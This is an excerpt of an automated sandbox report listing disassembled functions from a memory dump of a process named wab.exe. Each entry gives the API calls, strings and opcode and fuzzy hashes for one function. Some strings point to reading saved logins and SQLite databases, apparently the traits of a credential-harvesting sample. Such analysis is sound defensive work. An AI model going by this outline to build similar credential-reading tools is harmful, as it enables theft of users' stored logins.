                                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                            • memset.MSVCRT ref: 00413ADC
                                                                                            • memset.MSVCRT ref: 00413AEC
                                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                            • memset.MSVCRT ref: 00413BD7
                                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                            • String ID: 3A
                                                                                            • API String ID: 3300951397-293699754
                                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • memcpy.MSVCRT ref: 0040D24C
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                            • String ID: strings
                                                                                            • API String ID: 3166385802-3030018805
                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00411AF6
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                            • String ID: AE$.cfg$General$EA
                                                                                            • API String ID: 776488737-1622828088
                                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                            • memset.MSVCRT ref: 0040D906
                                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                            • String ID: sysdatetimepick32
                                                                                            • API String ID: 1028950076-4169760276
                                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: -journal$-wal
                                                                                            • API String ID: 438689982-2894717839
                                                                                            • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                            • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Dialog$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3975816621-0
                                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                                            • API String ID: 1214746602-2708368587
                                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                            • String ID:
                                                                                            • API String ID: 2313361498-0
                                                                                            • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                            • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                                            • String ID:
                                                                                            • API String ID: 2047574939-0
                                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                            • memcpy.MSVCRT ref: 0044A8BF
                                                                                            • memcpy.MSVCRT ref: 0044A90C
                                                                                            • memcpy.MSVCRT ref: 0044A988
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                            • memcpy.MSVCRT ref: 0044A9D8
                                                                                            • memcpy.MSVCRT ref: 0044AA19
                                                                                            • memcpy.MSVCRT ref: 0044AA4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: gj
                                                                                            • API String ID: 438689982-4203073231
                                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                            • API String ID: 3510742995-2446657581
                                                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                            • memset.MSVCRT ref: 00405ABB
                                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4281309102-0
                                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscat
                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                            • API String ID: 384018552-4153097237
                                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 2029023288-3849865405
                                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                            • memset.MSVCRT ref: 00405455
                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                            • memset.MSVCRT ref: 00405483
                                                                                            • memcpy.MSVCRT ref: 00405498
                                                                                            • memcpy.MSVCRT ref: 004054AD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                            • String ID: 6$\
                                                                                            • API String ID: 404372293-1284684873
                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1331804452-0
                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: advapi32.dll
                                                                                            • API String ID: 2012295524-4050573280
                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                            • <%s>, xrefs: 004100A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                            • API String ID: 3473751417-2880344631
                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2521778956-791839006
                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscpy
                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                            • API String ID: 999028693-502967061
                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2350177629-0
                                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
